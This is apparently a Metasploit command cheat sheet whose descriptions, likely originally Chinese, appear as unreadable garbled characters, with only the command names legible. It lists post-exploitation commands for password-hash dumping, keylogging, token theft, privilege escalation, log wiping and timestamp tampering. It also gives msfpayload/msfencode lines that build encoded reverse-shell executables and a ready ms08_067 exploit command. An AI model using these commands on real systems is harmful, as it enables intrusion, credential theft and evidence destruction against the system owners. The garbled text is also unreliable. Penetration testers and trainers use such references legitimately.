MSFնȫ
http://pan.baidu.com/share/link?shareid=183103&uk=1110131489
show exploits
гmetasploitеģ顣
show payloads
гmetasploitейغɡ
show auxiliary
гmetasploitеиغɡ
search name
metasploitеģ顣
info
չʾƶģϢ
use name
װһģ顣
LHOST
㱾ؿĿӵIPַͨĿͬһʱҪһIPַرΪʽshellʹá
RHOST
ԶĿ
set function
ضòEGñػԶ
setg function
ȫַʽضòEGñػԶ
show options
гijģеò
show targets
гֵ֧Ŀƽ̨
set target num
ָ֪ĿIJϵͳԼ汾͡
set payload name
ָҪʹõĹغɡ
show advanced
гиѡ
set autorunscript migrate -f
ɺԶǨƵһ̡
check
ĿǷѡӦİȫ©
exploit
ִģĿꡣ
exploit -j
ڼƻ½ں̨У
exploit -z
ɺػн
exploit -e encoder
ƶʹõĹغɱ뷽ʽEGexploit -e shikata_ga_nai
exploit -h
гexploitİϢ
sessions -l
гõĽỰڴshellʱʹã
sessions -l -v
гпõĽỰԼϸϢEGϵͳʱʹĸȫ©
sessions -s script
лԾmetasploitỰһضmetasploitű
sessions -K
ɱлԾĽỰ
sessions -c cmd
лԾmetasploitỰִһ
sessions -u sessionID
һͨwin32 shellmetasploit shell
db_create name
һݿҪʹõݿ⣨EGdb_create autopwn
db_connect name
һݿҪʹõݿ⣨EGdb_connect user:passwd@ip/sqlname
db_nmap
nmapɨݴ洢ݿУ֧ͨnmap䣬EG-sT -v -P0
db_autopwn -h
չʾdb_autopwnİϢ
db_autopwn -p -r -e
зֵĿŶ˿ִdb_autopwnϵͳʹһʽshell
db_destroy
ɾǰݿ⡣
db_destroy user:passwd@host:port/database
ʹøѡɾݿ⡣
***metasploit***
help
meterpreterʹð
run scriptname
meterpreterűscripts/meterpreterĿ¼¿ɲ鿴нű
sysinfo
гܿϵͳϢ
ls
гĿļļϢ
use priv
Ȩչģ飬չmetasploit⡣
ps
ʾеĽԼû˻
migrate PID
ǨƵһָĽIDPIDſͨpsϻã
use incognito
incognitoܣĿƻðû
list_tokens -u
гĿûĿơ
list_tokens -g
гĿûĿơ
impersonate_token DOMAIN_NAME\\USERNAME
ðĿϵĿơ
steal_token PID
Ը̵ĿƲƼð
drop_token
ֹͣðǰơ
getsystem
ֹͨϵͳûȨޡ
execute -f cmd.exe -i
ִcmd.exeн
execute -f cmd.exe -i -t
пִcmdظý̡
rev2self
صĿijʼû˻¡
reg command
ĿעннɾѯȲ
setdesktop number
лһû棨ùܻЩûѵ¼
screenshot
ĿĻнͼ
upload file
Ŀϴļ
download file
Ŀļ
keyscan_start
ԶĿ̼¼ܡ
keyscan_dump
洢Ŀϲļ̼¼
keyscan_stop
ֹͣĿļ̼¼
getprivs
ܶĻȡĿϵȨ
uictl enable keyboard/mouse
ӹĿļ̺ꡣ
background
㵱ǰmetasploit shellתΪִ̨С
hashdump
ĿеĿϣֵ
use sniffer
̽ģʽ
sniffer_interfaces
гĿпŵ˿ڡ
sniffer_dump interfaceID pcapname
Ŀ̽
sniffer_start interfaceID packet-buffer
ĿضΧݰ̽
sniffer_stats interfaceID
ȡʵʩ̽ӿڵͳݡ
sniffer_stop interfaceID
ֹͣ̽
add_user username password -h ip
ԶĿһû
clearev
Ŀϵ־¼
timestomp
ļԣļĴʱ䣨ȡ֤飩
reboot
Ŀ
***MSFpayload***
msfpayload -h
msfpayloadİϢ
msfpayload windows/meterpreter/bind_tcp O
гwindows/meterpreter/bind_tcp¿õĹغɵκιغɶǿõģ
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.exewindows¿ִг
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.rawļmsfencodeʹá
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
һmetasploitreverse_tcpغɣCʽshellcode
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
һmetasploitreverse_tcpغɣ%u뷽ʽjavaScriptַ
***msfencode***
msfencode -h
гmsfencodeİ
msfencode -l
гпõı
msfencode -t (c,elf,exe,java,js_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
ʾ뻺ĸʽ
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
ʹshikata_ga_naipayload.rawļ5룬ȻһΪencoded_payload.exeļ
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
һֱʽǶױĹغɡ
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
һĸֵshellcodeESIĴֻshellcodeCԸʽ
***MSFcli***
msfcli | grep exploit
гģ顣
msfcli | grep exploit/windows
гwindowsصģ顣
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
IPms08_067_netapibind_tcpغɣPORT˿ڽм